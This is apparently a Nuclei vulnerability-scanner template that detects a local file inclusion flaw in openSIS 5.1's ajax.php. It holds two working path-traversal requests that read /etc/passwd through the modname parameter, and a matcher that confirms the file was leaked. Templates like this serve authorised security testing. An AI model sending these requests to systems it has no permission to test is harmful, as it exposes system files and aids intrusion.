nuclei-templates/vulnerabilities/other/opensis-lfi.yaml

28 lines
685 B
YAML

id: opensis-lfi
info:
name: openSIS 5.1 - 'ajax.php' Local File Inclusion
author: pikpikcu
severity: high
reference:
- https://www.exploit-db.com/exploits/38039
- https://www.securityfocus.com/bid/56598/info
tags: opensis,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
- "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200